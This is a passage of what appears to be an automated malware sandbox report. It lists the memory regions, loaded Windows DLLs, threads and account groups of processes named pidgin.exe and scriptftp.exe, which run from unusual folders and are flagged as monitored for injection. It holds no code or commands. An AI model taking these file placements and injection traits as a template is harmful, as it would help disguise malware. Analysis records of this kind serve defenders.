= 0x290000 end_va = 0x34dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2363 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2364 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2365 start_va = 0x870000 end_va = 0x9f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 2366 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 2367 start_va = 0xb90000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 2368 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2369 start_va = 0x2050000 end_va = 0x210bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 2370 start_va = 0x21b0000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 2371 start_va = 0x21c0000 end_va = 0x2b83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 2372 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2373 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2374 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2375 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2376 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2377 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2378 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2379 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2380 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2381 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2382 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2383 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2384 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2385 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2386 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2387 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2388 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2389 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2390 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2391 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2392 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2393 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2394 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2395 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2396 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2397 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2399 start_va = 0x600000 end_va = 0x705fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Thread: id = 118 os_tid = 0xea0 Thread: id = 119 os_tid = 0x888 Process: id = "26" image_name = "pidgin.exe" filename = "c:\\program files\\windows sidebar\\pidgin.exe" page_root = "0x59d1b000" os_pid = "0x1008" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Sidebar\\pidgin.exe\" " cur_dir = "C:\\Program Files\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2400 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2401 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2402 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2403 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2404 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2405 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2406 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2407 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2408 start_va = 0x1c0000 end_va = 0x1d6fff monitored = 0 entry_point = 0x1c14a1 region_type = mapped_file name = "pidgin.exe" filename = "\\Program Files\\Windows Sidebar\\pidgin.exe" (normalized: "c:\\program files\\windows sidebar\\pidgin.exe") Region: id = 2409 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2410 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2411 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2412 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2413 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2414 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2415 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2416 start_va = 0x6f0000 end_va = 0x7abfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2417 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2418 start_va = 0x8e0000 end_va = 0xa67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2419 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 2420 start_va = 0xc00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 2421 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2422 start_va = 0x2100000 end_va = 0x2ac3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 2423 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2424 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2425 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2426 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2427 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2428 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2429 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2430 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2431 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2432 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2433 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2434 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2435 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2436 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2437 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2438 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2439 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2440 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2441 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2442 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2443 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2444 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2445 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2446 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2447 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2448 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2450 start_va = 0x5f0000 end_va = 0x6aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Thread: id = 120 os_tid = 0x1018 Thread: id = 121 os_tid = 0x100c Process: id = "27" image_name = "scriptftp.exe" filename = "c:\\program files\\reference assemblies\\scriptftp.exe" page_root = "0x4c425000" os_pid = "0x1010" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Reference Assemblies\\scriptftp.exe\" " cur_dir = "C:\\Program Files\\Reference Assemblies\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2451 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2452 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2453 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2454 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2455 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2456 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2457 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2458 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2459 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2460 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2461 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2462 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2463 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2464 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2465 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2466 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 2467 start_va = 0x890000 end_va = 0xa17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 2468 start_va = 0xa20000 end_va = 0xba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 2469 start_va = 0xc20000 end_va = 0xc36fff monitored = 0 entry_point = 0xc214a1 region_type = mapped_file name = "scriptftp.exe" filename = "\\Program Files\\Reference Assemblies\\scriptftp.exe" (normalized: "c:\\program files\\reference assemblies\\scriptftp.exe") Region: id = 2470 start_va = 0xc40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 2471 start_va = 0x2040000 end_va = 0x20fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 2472 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 2473 start_va = 0x21a0000 end_va = 0x2b63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 2474 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2475 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2476 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2477 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2478 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2479 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2480 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2481 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2482 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2483 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2484 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2485 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2486 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2487 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2488 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2489 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2490 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2491 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2492 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2493 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2494 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2495 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2496 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2497 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2498 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") 